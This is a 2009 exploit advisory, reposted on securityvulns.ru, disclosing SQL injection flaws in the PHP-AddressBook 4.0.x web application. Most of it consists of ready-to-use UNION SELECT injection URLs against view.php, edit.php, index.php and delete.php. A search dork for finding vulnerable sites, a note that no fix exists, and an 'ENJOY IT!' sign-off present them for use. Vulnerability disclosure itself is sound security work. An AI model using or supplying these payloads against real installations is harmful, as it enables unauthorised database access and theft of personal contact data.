Security Advisory: MULTIPLE SQL INJECTION VULNERABILITIES --PHP-AddressBook v-4.0.x-->

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  osTicket v1.6 RC4 Admin Login Blind SQLi
  AjaxPortal v3.0 Remote File Inclusion Vulnerability
  Mega File Manager Remote File Vuln
  Vulnerabilities in CMS SiteLogic

From: y3nh4ck3r_(at)_gmail.com <y3nh4ck3r_(at)_gmail.com>
Date: 29.06.2009
Subject: MULTIPLE SQL INJECTION VULNERABILITIES --PHP-AddressBook v-4.0.x-->

--------------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --PHP-AddressBook v-4.0.X-->
--------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/php-addressbook/
-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/
-->DEMO: http://php-addressbook.sourceforge.net/demo/
-->CATEGORY: Address Book
-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer.
               Manage groups, addresses, e-Mails, phone numbers & birthdays...
-->RELEASED: 2009-06-13

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "php-addressbook"
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: 4.0.X
-->Discovered Bug date: 2009-06-16
-->Reported Bug date: 2009-06-16
-->Fixed bug date: N/A
-->Info patch (????): N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0
is highest).

#####################
////////////////////

SQL INJECTION VULN:

////////////////////
#####################

-----------
EXPLOITS:
-----------

<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>

[++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,
3,4,5,6,7,8,9,10,11,12,13,14%23

[++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,
user(),4,5,6,7,8,9,10,11,12,13,14%23

[++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,
user(),4,5,6,7,8,9,10,11,12,13,14%23

<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>

[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,
user(),4,5,6,7,8,9,10,11,12,13,14%23

-------------
WATCH VIDEO:
-------------

SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo

<<<-----------------------------EOF----------------------------------
>>>ENJOY IT!

#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################